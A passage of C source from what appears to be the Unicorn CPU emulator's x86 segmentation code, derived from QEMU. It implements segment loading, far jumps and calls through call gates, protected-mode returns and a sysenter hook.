ptr; if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK)) { return 0; } else { selector = sel & 0xffff; cpl = env->hflags & HF_CPL_MASK; if ((selector & 0xfffc) == 0) { /* null selector case */ if (seg_reg == R_SS #ifdef TARGET_X86_64 && (!(env->hflags & HF_CS64_MASK) || cpl == 3) #endif ) { return UC_ERR_EXCEPTION; } return 0; } else { if (selector & 0x4) { dt = &env->ldt; } else { dt = &env->gdt; } index = selector & ~7; if ((index + 7) > dt->limit) { return UC_ERR_EXCEPTION; } ptr = dt->base + index; e2 = cpu_ldl_kernel(env, ptr + 4); if (!(e2 & DESC_S_MASK)) { return UC_ERR_EXCEPTION; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (seg_reg == R_SS) { /* must be writable segment */ if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { return UC_ERR_EXCEPTION; } if (rpl != cpl || dpl != cpl) { return UC_ERR_EXCEPTION; } } else { /* must be readable segment */ if ((e2 & (DESC_CS_MASK | DESC_R_MASK)) == DESC_CS_MASK) { return UC_ERR_EXCEPTION; } if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { /* if not conforming code, test rights */ if (dpl < cpl || dpl < rpl) { return UC_ERR_EXCEPTION; } } } if (!(e2 & DESC_P_MASK)) { if (seg_reg == R_SS) { return UC_ERR_EXCEPTION; } else { return UC_ERR_EXCEPTION; } } } } return 0; } /* only works if protected mode and not VM86. seg_reg must be != R_CS */ void helper_load_seg(CPUX86State *env, int seg_reg, int selector) { uint32_t e1, e2; int cpl, dpl, rpl; SegmentCache *dt; int index; target_ulong ptr; selector &= 0xffff; cpl = env->hflags & HF_CPL_MASK; if ((selector & 0xfffc) == 0) { /* null selector case */ if (seg_reg == R_SS #ifdef TARGET_X86_64 && (!(env->hflags & HF_CS64_MASK) || cpl == 3) #endif ) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } cpu_x86_load_seg_cache(env, seg_reg, selector, 0, 0, 0); } else { if (selector & 0x4) { dt = &env->ldt; } else { dt = &env->gdt; } index = selector & ~7; if ((index + 7) > dt->limit) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } ptr = dt->base + index; e1 = cpu_ldl_kernel_ra(env, ptr, GETPC()); e2 = cpu_ldl_kernel_ra(env, ptr + 4, GETPC()); if (!(e2 & DESC_S_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (seg_reg == R_SS) { /* must be writable segment */ if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (rpl != cpl || dpl != cpl) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } } else { /* must be readable segment */ if ((e2 & (DESC_CS_MASK | DESC_R_MASK)) == DESC_CS_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { /* if not conforming code, test rights */ if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } } } if (!(e2 & DESC_P_MASK)) { if (seg_reg == R_SS) { raise_exception_err_ra(env, EXCP0C_STACK, selector & 0xfffc, GETPC()); } else { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, GETPC()); } } /* set the access bit if not already set */ if (!(e2 & DESC_A_MASK)) { e2 |= DESC_A_MASK; cpu_stl_kernel_ra(env, ptr + 4, e2, GETPC()); } cpu_x86_load_seg_cache(env, seg_reg, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); #if 0 qemu_log("load_seg: sel=0x%04x base=0x%08lx limit=0x%08lx flags=%08x\n", selector, (unsigned long)sc->base, sc->limit, sc->flags); #endif } } /* protected mode jump */ void helper_ljmp_protected(CPUX86State *env, int new_cs, target_ulong new_eip, target_ulong next_eip) { int gate_cs, type; uint32_t e1, e2, cpl, dpl, rpl, limit; if ((new_cs & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } if (load_segment_ra(env, &e1, &e2, new_cs, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_S_MASK) { if (!(e2 & DESC_CS_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (e2 & DESC_C_MASK) { /* conforming code segment */ if (dpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } else { /* non conforming code segment */ rpl = new_cs & 3; if (rpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } if (dpl != cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, GETPC()); } limit = get_seg_limit(e1, e2); if (new_eip > limit && (!(env->hflags & HF_LMA_MASK) || !(e2 & DESC_L_MASK))) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, get_seg_base(e1, e2), limit, e2); env->eip = new_eip; } else { /* jump to call or task gate */ dpl = (e2 >> DESC_DPL_SHIFT) & 3; rpl = new_cs & 3; cpl = env->hflags & HF_CPL_MASK; type = (e2 >> DESC_TYPE_SHIFT) & 0xf; #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { if (type != 12) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } #endif switch (type) { case 1: /* 286 TSS */ case 9: /* 386 TSS */ case 5: /* task gate */ if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } switch_tss_ra(env, new_cs, e1, e2, SWITCH_TSS_JMP, next_eip, GETPC()); break; case 4: /* 286 call gate */ case 12: /* 386 call gate */ if ((dpl < cpl) || (dpl < rpl)) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, GETPC()); } gate_cs = e1 >> 16; new_eip = (e1 & 0xffff); if (type == 12) { new_eip |= (e2 & 0xffff0000); } #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { /* load the upper 8 bytes of the 64-bit call gate */ if (load_segment_ra(env, &e1, &e2, new_cs + 8, GETPC())) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; if (type != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } new_eip |= ((target_ulong)e1) << 32; } #endif if (load_segment_ra(env, &e1, &e2, gate_cs, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; /* must be code segment */ if (((e2 & (DESC_S_MASK | DESC_CS_MASK)) != (DESC_S_MASK | DESC_CS_MASK))) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } if (((e2 & DESC_C_MASK) && (dpl > cpl)) || (!(e2 & DESC_C_MASK) && (dpl != cpl))) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { if (!(e2 & DESC_L_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } if (e2 & DESC_B_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } } #endif if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } limit = get_seg_limit(e1, e2); if (new_eip > limit && (!(env->hflags & HF_LMA_MASK) || !(e2 & DESC_L_MASK))) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } cpu_x86_load_seg_cache(env, R_CS, (gate_cs & 0xfffc) | cpl, get_seg_base(e1, e2), limit, e2); env->eip = new_eip; break; default: raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); break; } } } /* real mode call */ void helper_lcall_real(CPUX86State *env, int new_cs, target_ulong new_eip1, int shift, int next_eip) { int new_eip; uint32_t esp, esp_mask; target_ulong ssp; new_eip = new_eip1; esp = env->regs[R_ESP]; esp_mask = get_sp_mask(env->segs[R_SS].flags); ssp = env->segs[R_SS].base; if (shift) { PUSHL_RA(ssp, esp, esp_mask, env->segs[R_CS].selector, GETPC()); PUSHL_RA(ssp, esp, esp_mask, next_eip, GETPC()); } else { PUSHW_RA(ssp, esp, esp_mask, env->segs[R_CS].selector, GETPC()); PUSHW_RA(ssp, esp, esp_mask, next_eip, GETPC()); } SET_ESP(esp, esp_mask); env->eip = new_eip; env->segs[R_CS].selector = new_cs; env->segs[R_CS].base = (new_cs << 4); } /* protected mode call */ void helper_lcall_protected(CPUX86State *env, int new_cs, target_ulong new_eip, int shift, target_ulong next_eip) { int new_stack, i; uint32_t e1, e2, cpl, dpl, rpl, selector, param_count; uint32_t ss = 0, ss_e1 = 0, ss_e2 = 0, type, ss_dpl, sp_mask; uint32_t val, limit, old_sp_mask; target_ulong ssp, old_ssp, offset, sp; LOG_PCALL("lcall %04x:" TARGET_FMT_lx " s=%d\n", new_cs, new_eip, shift); LOG_PCALL_STATE(env_cpu(env)); if ((new_cs & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } if (load_segment_ra(env, &e1, &e2, new_cs, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } cpl = env->hflags & HF_CPL_MASK; LOG_PCALL("desc=%08x:%08x\n", e1, e2); if (e2 & DESC_S_MASK) { if (!(e2 & DESC_CS_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (e2 & DESC_C_MASK) { /* conforming code segment */ if (dpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } else { /* non conforming code segment */ rpl = new_cs & 3; if (rpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } if (dpl != cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 /* XXX: check 16/32 bit cases in long mode */ if (shift == 2) { target_ulong rsp; /* 64 bit case */ rsp = env->regs[R_ESP]; PUSHQ_RA(rsp, env->segs[R_CS].selector, GETPC()); PUSHQ_RA(rsp, next_eip, GETPC()); /* from this point, not restartable */ env->regs[R_ESP] = rsp; cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); env->eip = new_eip; } else #endif { sp = env->regs[R_ESP]; sp_mask = get_sp_mask(env->segs[R_SS].flags); ssp = env->segs[R_SS].base; if (shift) { PUSHL_RA(ssp, sp, sp_mask, env->segs[R_CS].selector, GETPC()); PUSHL_RA(ssp, sp, sp_mask, next_eip, GETPC()); } else { PUSHW_RA(ssp, sp, sp_mask, env->segs[R_CS].selector, GETPC()); PUSHW_RA(ssp, sp, sp_mask, next_eip, GETPC()); } limit = get_seg_limit(e1, e2); if (new_eip > limit) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } /* from this point, not restartable */ SET_ESP(sp, sp_mask); cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, get_seg_base(e1, e2), limit, e2); env->eip = new_eip; } } else { /* check gate type */ type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; dpl = (e2 >> DESC_DPL_SHIFT) & 3; rpl = new_cs & 3; #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { if (type != 12) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } #endif switch (type) { case 1: /* available 286 TSS */ case 9: /* available 386 TSS */ case 5: /* task gate */ if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } switch_tss_ra(env, new_cs, e1, e2, SWITCH_TSS_CALL, next_eip, GETPC()); return; case 4: /* 286 call gate */ case 12: /* 386 call gate */ break; default: raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); break; } shift = type >> 3; if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } /* check valid bit */ if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, GETPC()); } selector = e1 >> 16; param_count = e2 & 0x1f; offset = (e2 & 0xffff0000) | (e1 & 0x0000ffff); #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { /* load the upper 8 bytes of the 64-bit call gate */ if (load_segment_ra(env, &e1, &e2, new_cs + 8, GETPC())) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; if (type != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } offset |= ((target_ulong)e1) << 32; } #endif if ((selector & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (dpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { if (!(e2 & DESC_L_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (e2 & DESC_B_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } shift++; } #endif if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_C_MASK) && dpl < cpl) { /* to inner privilege */ #ifdef TARGET_X86_64 if (shift == 2) { sp = get_rsp_from_tss(env, dpl); ss = dpl; /* SS = NULL selector with RPL = new CPL */ new_stack = 1; sp_mask = 0; ssp = 0; /* SS base is always zero in IA-32e mode */ LOG_PCALL("new ss:rsp=%04x:%016llx env->regs[R_ESP]=" TARGET_FMT_lx "\n", ss, sp, env->regs[R_ESP]); } else #endif { uint32_t sp32; get_ss_esp_from_tss(env, &ss, &sp32, dpl, GETPC()); LOG_PCALL("new ss:esp=%04x:%08x param_count=%d env->regs[R_ESP]=" TARGET_FMT_lx "\n", ss, sp32, param_count, env->regs[R_ESP]); sp = sp32; if ((ss & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } if ((ss & 3) != dpl) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } if (load_segment_ra(env, &ss_e1, &ss_e2, ss, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } ss_dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; if (ss_dpl != dpl) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } if (!(ss_e2 & DESC_S_MASK) || (ss_e2 & DESC_CS_MASK) || !(ss_e2 & DESC_W_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } if (!(ss_e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } sp_mask = get_sp_mask(ss_e2); ssp = get_seg_base(ss_e1, ss_e2); } /* push_size = ((param_count * 2) + 8) << shift; */ old_sp_mask = get_sp_mask(env->segs[R_SS].flags); old_ssp = env->segs[R_SS].base; #ifdef TARGET_X86_64 if (shift == 2) { /* XXX: verify if new stack address is canonical */ PUSHQ_RA(sp, env->segs[R_SS].selector, GETPC()); PUSHQ_RA(sp, env->regs[R_ESP], GETPC()); /* parameters aren't supported for 64-bit call gates */ } else #endif if (shift == 1) { PUSHL_RA(ssp, sp, sp_mask, env->segs[R_SS].selector, GETPC()); PUSHL_RA(ssp, sp, sp_mask, env->regs[R_ESP], GETPC()); for (i = param_count - 1; i >= 0; i--) { val = cpu_ldl_kernel_ra(env, old_ssp + ((env->regs[R_ESP] + i * 4) & old_sp_mask), GETPC()); PUSHL_RA(ssp, sp, sp_mask, val, GETPC()); } } else { PUSHW_RA(ssp, sp, sp_mask, env->segs[R_SS].selector, GETPC()); PUSHW_RA(ssp, sp, sp_mask, env->regs[R_ESP], GETPC()); for (i = param_count - 1; i >= 0; i--) { val = cpu_lduw_kernel_ra(env, old_ssp + ((env->regs[R_ESP] + i * 2) & old_sp_mask), GETPC()); PUSHW_RA(ssp, sp, sp_mask, val, GETPC()); } } new_stack = 1; } else { /* to same privilege */ sp = env->regs[R_ESP]; sp_mask = get_sp_mask(env->segs[R_SS].flags); ssp = env->segs[R_SS].base; /* push_size = (4 << shift); */ new_stack = 0; } #ifdef TARGET_X86_64 if (shift == 2) { PUSHQ_RA(sp, env->segs[R_CS].selector, GETPC()); PUSHQ_RA(sp, next_eip, GETPC()); } else #endif if (shift == 1) { PUSHL_RA(ssp, sp, sp_mask, env->segs[R_CS].selector, GETPC()); PUSHL_RA(ssp, sp, sp_mask, next_eip, GETPC()); } else { PUSHW_RA(ssp, sp, sp_mask, env->segs[R_CS].selector, GETPC()); PUSHW_RA(ssp, sp, sp_mask, next_eip, GETPC()); } /* from this point, not restartable */ if (new_stack) { #ifdef TARGET_X86_64 if (shift == 2) { cpu_x86_load_seg_cache(env, R_SS, ss, 0, 0, 0); } else #endif { ss = (ss & ~3) | dpl; cpu_x86_load_seg_cache(env, R_SS, ss, ssp, get_seg_limit(ss_e1, ss_e2), ss_e2); } } selector = (selector & ~3) | dpl; cpu_x86_load_seg_cache(env, R_CS, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); SET_ESP(sp, sp_mask); env->eip = offset; } } /* real and vm86 mode iret */ void helper_iret_real(CPUX86State *env, int shift) { uint32_t sp, new_cs, new_eip, new_eflags, sp_mask; target_ulong ssp; int eflags_mask; sp_mask = 0xffff; /* XXXX: use SS segment size? */ sp = env->regs[R_ESP]; ssp = env->segs[R_SS].base; if (shift == 1) { /* 32 bits */ POPL_RA(ssp, sp, sp_mask, new_eip, GETPC()); POPL_RA(ssp, sp, sp_mask, new_cs, GETPC()); new_cs &= 0xffff; POPL_RA(ssp, sp, sp_mask, new_eflags, GETPC()); } else { /* 16 bits */ POPW_RA(ssp, sp, sp_mask, new_eip, GETPC()); POPW_RA(ssp, sp, sp_mask, new_cs, GETPC()); POPW_RA(ssp, sp, sp_mask, new_eflags, GETPC()); } env->regs[R_ESP] = (env->regs[R_ESP] & ~sp_mask) | (sp & sp_mask); env->segs[R_CS].selector = new_cs; env->segs[R_CS].base = (new_cs << 4); env->eip = new_eip; if (env->eflags & VM_MASK) { eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | RF_MASK | NT_MASK; } else { eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | RF_MASK | NT_MASK; } if (shift == 0) { eflags_mask &= 0xffff; } cpu_load_eflags(env, new_eflags, eflags_mask); env->hflags2 &= ~HF2_NMI_MASK; } static inline void validate_seg(CPUX86State *env, int seg_reg, int cpl) { int dpl; uint32_t e2; /* XXX: on x86_64, we do not want to nullify FS and GS because they may still contain a valid base. I would be interested to know how a real x86_64 CPU behaves */ if ((seg_reg == R_FS || seg_reg == R_GS) && (env->segs[seg_reg].selector & 0xfffc) == 0) { return; } e2 = env->segs[seg_reg].flags; dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { /* data or non conforming code segment */ if (dpl < cpl) { cpu_x86_load_seg_cache(env, seg_reg, 0, 0, 0, 0); } } } /* protected mode iret */ static inline void helper_ret_protected(CPUX86State *env, int shift, int is_iret, int addend, uintptr_t retaddr) { uint32_t new_cs, new_eflags, new_ss; uint32_t new_es, new_ds, new_fs, new_gs; uint32_t e1, e2, ss_e1, ss_e2; int cpl, dpl, rpl, eflags_mask, iopl; target_ulong ssp, sp, new_eip, new_esp, sp_mask; #ifdef TARGET_X86_64 if (shift == 2) { sp_mask = -1; } else #endif { sp_mask = get_sp_mask(env->segs[R_SS].flags); } sp = env->regs[R_ESP]; ssp = env->segs[R_SS].base; new_eflags = 0; /* avoid warning */ #ifdef TARGET_X86_64 if (shift == 2) { POPQ_RA(sp, new_eip, retaddr); POPQ_RA(sp, new_cs, retaddr); new_cs &= 0xffff; if (is_iret) { POPQ_RA(sp, new_eflags, retaddr); } } else #endif { if (shift == 1) { /* 32 bits */ POPL_RA(ssp, sp, sp_mask, new_eip, retaddr); POPL_RA(ssp, sp, sp_mask, new_cs, retaddr); new_cs &= 0xffff; if (is_iret) { POPL_RA(ssp, sp, sp_mask, new_eflags, retaddr); if (new_eflags & VM_MASK) { goto return_to_vm86; } } } else { /* 16 bits */ POPW_RA(ssp, sp, sp_mask, new_eip, retaddr); POPW_RA(ssp, sp, sp_mask, new_cs, retaddr); if (is_iret) { POPW_RA(ssp, sp, sp_mask, new_eflags, retaddr); } } } LOG_PCALL("lret new %04x:" TARGET_FMT_lx " s=%d addend=0x%x\n", new_cs, new_eip, shift, addend); LOG_PCALL_STATE(env_cpu(env)); if ((new_cs & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } if (load_segment_ra(env, &e1, &e2, new_cs, retaddr) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } if (!(e2 & DESC_S_MASK) || !(e2 & DESC_CS_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } cpl = env->hflags & HF_CPL_MASK; rpl = new_cs & 3; if (rpl < cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (e2 & DESC_C_MASK) { if (dpl > rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } } else { if (dpl != rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, retaddr); } sp += addend; if (rpl == cpl && (!(env->hflags & HF_CS64_MASK) || ((env->hflags & HF_CS64_MASK) && !is_iret))) { /* return to same privilege level */ cpu_x86_load_seg_cache(env, R_CS, new_cs, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); } else { /* return to different privilege level */ #ifdef TARGET_X86_64 if (shift == 2) { POPQ_RA(sp, new_esp, retaddr); POPQ_RA(sp, new_ss, retaddr); new_ss &= 0xffff; } else #endif { if (shift == 1) { /* 32 bits */ POPL_RA(ssp, sp, sp_mask, new_esp, retaddr); POPL_RA(ssp, sp, sp_mask, new_ss, retaddr); new_ss &= 0xffff; } else { /* 16 bits */ POPW_RA(ssp, sp, sp_mask, new_esp, retaddr); POPW_RA(ssp, sp, sp_mask, new_ss, retaddr); } } LOG_PCALL("new ss:esp=%04x:" TARGET_FMT_lx "\n", new_ss, new_esp); if ((new_ss & 0xfffc) == 0) { #ifdef TARGET_X86_64 /* NULL ss is allowed in long mode if cpl != 3 */ /* XXX: test CS64? */ if ((env->hflags & HF_LMA_MASK) && rpl != 3) { cpu_x86_load_seg_cache(env, R_SS, new_ss, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (rpl << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); ss_e2 = DESC_B_MASK; /* XXX: should not be needed? */ } else #endif { raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr); } } else { if ((new_ss & 3) != rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr); } if (load_segment_ra(env, &ss_e1, &ss_e2, new_ss, retaddr) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr); } if (!(ss_e2 & DESC_S_MASK) || (ss_e2 & DESC_CS_MASK) || !(ss_e2 & DESC_W_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr); } dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; if (dpl != rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr); } if (!(ss_e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_ss & 0xfffc, retaddr); } cpu_x86_load_seg_cache(env, R_SS, new_ss, get_seg_base(ss_e1, ss_e2), get_seg_limit(ss_e1, ss_e2), ss_e2); } cpu_x86_load_seg_cache(env, R_CS, new_cs, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); sp = new_esp; #ifdef TARGET_X86_64 if (env->hflags & HF_CS64_MASK) { sp_mask = -1; } else #endif { sp_mask = get_sp_mask(ss_e2); } /* validate data segments */ validate_seg(env, R_ES, rpl); validate_seg(env, R_DS, rpl); validate_seg(env, R_FS, rpl); validate_seg(env, R_GS, rpl); sp += addend; } SET_ESP(sp, sp_mask); env->eip = new_eip; if (is_iret) { /* NOTE: 'cpl' is the _old_ CPL */ eflags_mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK; if (cpl == 0) { eflags_mask |= IOPL_MASK; } iopl = (env->eflags >> IOPL_SHIFT) & 3; if (cpl <= iopl) { eflags_mask |= IF_MASK; } if (shift == 0) { eflags_mask &= 0xffff; } cpu_load_eflags(env, new_eflags, eflags_mask); } return; return_to_vm86: POPL_RA(ssp, sp, sp_mask, new_esp, retaddr); POPL_RA(ssp, sp, sp_mask, new_ss, retaddr); POPL_RA(ssp, sp, sp_mask, new_es, retaddr); POPL_RA(ssp, sp, sp_mask, new_ds, retaddr); POPL_RA(ssp, sp, sp_mask, new_fs, retaddr); POPL_RA(ssp, sp, sp_mask, new_gs, retaddr); /* modify processor state */ cpu_load_eflags(env, new_eflags, TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | VM_MASK | NT_MASK | VIF_MASK | VIP_MASK); load_seg_vm(env, R_CS, new_cs & 0xffff); load_seg_vm(env, R_SS, new_ss & 0xffff); load_seg_vm(env, R_ES, new_es & 0xffff); load_seg_vm(env, R_DS, new_ds & 0xffff); load_seg_vm(env, R_FS, new_fs & 0xffff); load_seg_vm(env, R_GS, new_gs & 0xffff); env->eip = new_eip & 0xffff; env->regs[R_ESP] = new_esp; } void helper_iret_protected(CPUX86State *env, int shift, int next_eip) { int tss_selector, type; uint32_t e1, e2; /* specific case for TSS */ if (env->eflags & NT_MASK) { #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } #endif tss_selector = cpu_lduw_kernel_ra(env, env->tr.base + 0, GETPC()); if (tss_selector & 4) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, GETPC()); } if (load_segment_ra(env, &e1, &e2, tss_selector, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, GETPC()); } type = (e2 >> DESC_TYPE_SHIFT) & 0x17; /* NOTE: we check both segment and busy TSS */ if (type != 3) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, GETPC()); } switch_tss_ra(env, tss_selector, e1, e2, SWITCH_TSS_IRET, next_eip, GETPC()); } else { helper_ret_protected(env, shift, 1, 0, GETPC()); } env->hflags2 &= ~HF2_NMI_MASK; } void helper_lret_protected(CPUX86State *env, int shift, int addend) { helper_ret_protected(env, shift, 0, addend, GETPC()); } void helper_sysenter(CPUX86State *env, int next_eip_addend) { // Unicorn: call registered SYSENTER hooks struct hook *hook; uc_engine *uc = env->uc; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, env->eip)) continue; if (hook->insn == UC_X86_INS_SYSENTER) { JIT_CALLBACK_GUARD(((uc_cb_insn_syscall_t)hook->callback)(env->uc, hook->user_data)); } // the last callback may already asked to stop emulation if (env->uc->stop_request) break; } env->eip += next_eip_addend; } void helper_sysexit(CPUX86State *env, int dflag) { int cpl; cpl = env->hflags & HF_CPL_MASK; if (env->sysenter_cs == 0 || cpl != 0) { 